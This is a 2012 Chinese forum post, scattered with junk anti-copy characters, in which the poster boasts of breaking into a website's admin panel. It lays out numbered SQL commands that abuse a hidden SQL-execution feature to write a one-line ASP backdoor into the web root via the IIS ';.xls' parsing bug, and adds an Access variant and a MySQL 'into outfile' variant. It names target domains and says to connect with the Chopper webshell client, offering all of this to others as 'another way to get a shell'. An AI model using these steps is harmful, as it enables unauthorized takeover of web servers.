好不容易进了后台,发现啥上传啊。备份啊多木有。
+ Q& \' K- K+ P# [" iwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的5 r. l( }, ^( _, u6 Z3 Q3 `& \
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
& l) R: C6 V; j( C" Y8 A' m" p$ K然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
- V' }3 s+ `, R6 \3 {1.create table cmd (a varchar(50))
" \4 ?9 v- @1 S3 z4 b2.insert into cmd (a) values (‘‘)8 F' s! B0 t! ^* e8 m. c
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd% F8 p- H% z$ a! [5 n* `* r+ O
(把表cmd的内容导出为物理路径的一个EXCEL文件)" V% x4 I _7 k
4.drop table cmd
& z0 `4 k- ? U3 `. T- _# m利用IIS的BUG成功拿到了WEBSHELL。6 y: `' |% f1 o& R5 @6 W# E
! l; m( f5 a2 E; r' C, |; P
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
1 [* u. M3 q' R
% I$ [5 N9 |2 `6 A6 i( Q( y+ W2 O SQL语句意思解释:
T$ Q. D" B: W( @% _( x& A# ` 第一句) E6 k7 r9 O* M5 \
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
' W% A/ R7 B2 N* e0 i+ r
# s# p+ j9 K" D4 G: Z5 r 第二句
U# M; U3 f6 p# [4 F 在表cmd的a字段插入一句话木马
% |9 K5 y1 s+ |5 S. ~, _3 }/ N T 第三句
( p- l$ a9 p; J: E 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件6 W3 h5 ~6 A8 T% L3 X7 l! e9 I
& D, }7 V: ]+ ` |* H k& ? 第四句
) I6 R3 _. G) |+ ] 删除建立的cmd表% m$ s& l. p+ [, P4 z
' m6 v- |8 D$ ?0 b
以下内容为测试:
6 u5 G7 F" e# e3 ] Access利用后台SQL执行命令功能导出WebShell:
. @: F' V- x+ e6 c, v 这个更简单:
9 e( v( x/ ` C Y [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]2 ]1 V+ b$ X" t7 ?& R
或者
& Q- z3 J) X8 a: X [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]( g* d& E9 D6 {
, G B2 l8 k0 O
后台有执行SQL语句功能(vote为已知表段)
, p: C' A7 m! ^! u9 V4 i8 ` 希望对大家有所帮助拿shell的又一个思路
, i7 k: \1 o' ?; Y |
发表于 2012-9-13 17:53:58
收藏
支持
反对